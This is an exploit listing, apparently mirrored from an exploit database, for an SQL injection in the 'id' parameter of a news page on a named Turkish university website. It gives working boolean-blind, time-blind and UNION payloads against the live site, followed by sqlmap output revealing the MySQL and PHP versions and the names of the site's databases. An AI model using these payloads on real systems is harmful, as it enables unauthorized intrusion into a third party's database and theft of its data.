Bayburt Üniversitesi SQL Injection

CVE: N/A
Category: CWE-89
Price: N/A
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2020-01-22
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010172

Below is a copy:

# Exploit Title: Bayburt Üniversitesi SQL Injection
# Date: 22.01.2020
# Exploit Author: Furkan zer
# Vendor Homepage: bumer.bayburt.edu.tr

Link##: https://bumer.bayburt.edu.tr/haber.php?id=[] sql li 

 https://bumer.bayburt.edu.tr/haber.php?id=16 

Payloads : id=16' AND 1280=1280 AND 'xtXi'='xtXi


Parameter: id (GET)                                                                                                                                                      
    Type: boolean-based blind                                                                                                                                            
    Title: AND boolean-based blind - WHERE or HAVING clause                                                                                                              
    Payload: id=16' AND 1280=1280 AND 'xtXi'='xtXi                                                                                                                       
                                                                                                                                                                         
    Type: time-based blind                                                                                                                                               
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                                                                                            
    Payload: id=16' AND (SELECT 6646 FROM (SELECT(SLEEP(5)))rjJt) AND 'AQkr'='AQkr                                                                                       
                                                                                                                                                                         
    Type: UNION query                                                                                                                                                    
    Title: Generic UNION query (NULL) - 7 columns                                                                                                                        
    Payload: id=16' UNION ALL SELECT NULL,CONCAT(0x7162626271,0x795147476369727a5770775858705943614948507a7547516368485175506b535873724463487263,0x716b627071),NULL,NULL,
NULL,NULL,NULL-- pPTp                                                                                                                                                    
---                                                                                                                                                                      
[19:18:07] [INFO] the back-end DBMS is MySQL                                                                                                                             
web application technology: PHP 5.6.31, Apache 2.4.27, PHP                                                                                                               
back-end DBMS: MySQL >= 5.0.12                                                                                                                                           
[19:18:07] [INFO] fetching database names                                                                                                                                
available databases [6]:                                                                                                                                                 
[*] cobozero_adsd69                                                                                                                                                      
[*] cobozero_bumer6                                                                                                                                                      
[*] information_schema                                                                                                                                                   
[*] mysql                                                                                                                                                                
[*] performance_schema                                                                                                                                                   
[*] sys                               


[162 entries]
